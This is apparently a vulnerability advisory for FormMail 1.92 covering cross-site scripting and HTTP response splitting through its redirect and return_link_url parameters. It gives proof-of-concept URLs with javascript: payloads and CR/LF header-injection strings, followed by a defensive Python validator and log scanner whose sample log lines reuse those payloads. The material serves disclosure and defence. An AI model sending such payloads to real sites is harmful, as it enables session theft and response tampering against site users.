FormMail HTTP Response Splitting and Cross-Site Scripting Vulnerability

Affected versions:
Matt Wright FormMail 1.92

Vulnerability description:

The FormMail.pl script does not properly validate the user-supplied redirect and return_link_url parameters. A remote attacker can submit a crafted request to carry out a cross-site scripting attack (by supplying a javascript: URL that is echoed into the redirect or the return link) or to inject arbitrary HTTP headers into the response returned to the user (by embedding CR/LF sequences in the redirect target, which is written into the Location header).

Exploit (proof-of-concept URLs, one per line):

http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&redirect=javascript:alert(%27USH%27);

http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH

http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;

http://www.example.com/FormMail.pl?recipient=foobar@example.com&subject=1&redirect=http://www.example.com%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.example.com
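Both payload classes above (a javascript: URL placed in redirect or return_link_url, and CR/LF sequences that split the response) fail one validation rule: the parameter must decode to an http(s) URL with a host and no control characters. The Python below is an added example, not FormMail's code and not a vendor patch; it applies that rule as an input check and as a scanner over constructed access-log lines whose query strings reuse the proof-of-concept URLs from this advisory. The function names, the log format and the sample lines are assumptions made for the example.

```python
"""Added example (not FormMail's own code): validate FormMail-style redirect
parameters and flag access-log requests that carry javascript: targets or
CR/LF header injection in redirect / return_link_url."""
import re
from urllib.parse import urlsplit, unquote_plus

# Schemes an absolute redirect target may use. javascript:, data:,
# scheme-less and protocol-relative (//host) targets are all rejected.
ALLOWED_SCHEMES = {"http", "https"}

# Any control character in a value that ends up in a Location header or an
# href is enough for response splitting, so reject all of them, not only CR/LF.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

# Request target in an Apache/NCSA style access-log line (assumed format).
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def is_safe_redirect(raw_value: str) -> bool:
    """True only if the percent-encoded value decodes to a plain http(s) URL
    with a host and no control characters. FormMail's redirect is an absolute
    URL, so relative paths are rejected as well."""
    decoded = unquote_plus(raw_value)      # decode exactly once, as the CGI does
    if CONTROL_CHARS.search(decoded):
        return False                       # %0D%0A, %0F, ... -> header injection
    parts = urlsplit(decoded.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                       # javascript:, data:, relative, ...
    return bool(parts.netloc)              # require an actual host


def parse_query(query: str):
    """Split a raw query string on '&' into (name, raw_value) pairs. Values stay
    percent-encoded so they are decoded once, inside is_safe_redirect. Done by
    hand because parse_qs also split on ';' in older Python versions, which
    would truncate the payloads seen in this advisory."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), value))
    return pairs


def flag_suspicious_requests(log_lines, watched=("redirect", "return_link_url")):
    """Return (param_name, decoded_value) for every watched parameter in the
    log lines whose value does not pass is_safe_redirect."""
    flagged = []
    for line in log_lines:
        match = REQUEST_TARGET.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for name, raw_value in parse_query(query):
            if name in watched and not is_safe_redirect(raw_value):
                flagged.append((name, unquote_plus(raw_value)))
    return flagged


# Constructed sample log lines. The query strings reuse the advisory's
# proof-of-concept URLs (example.com hosts, 'USH' marker); the first is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2006:12:00:00 +0000] "GET /cgi-bin/FormMail.pl'
    '?recipient=foobar@example.com&subject=1'
    '&redirect=http://www.example.com/thanks.html HTTP/1.1" 302 0',
    '10.0.0.7 - - [01/Jan/2006:12:00:01 +0000] "GET /cgi-bin/FormMail.pl'
    '?recipient=foobar@example.com&subject=1'
    '&redirect=javascript:alert(%27USH%27); HTTP/1.1" 302 0',
    '10.0.0.7 - - [01/Jan/2006:12:00:02 +0000] "GET /cgi-bin/FormMail.pl'
    '?recipient=foobar@example.com&subject=1'
    '&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2006:12:00:03 +0000] "GET /cgi-bin/FormMail.pl'
    '?recipient=foobar@example.com&subject=1'
    '&redirect=http://www.example.com%0D%0ASet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection; HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for name, value in flag_suspicious_requests(SAMPLE_LOG):
        print(f"{name}={value!r}")
```

The check deliberately decodes the value once and inspects the decoded form: the raw log line only shows `%0D%0A`, but the CGI writes the decoded CR/LF into the header, so matching on the encoded form alone would miss alternative encodings. Rejecting every control character rather than just CR and LF also covers the `%0F` byte used in the last proof-of-concept URL.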

Solution:
Vendor patch:
http://worldwidemart.com/
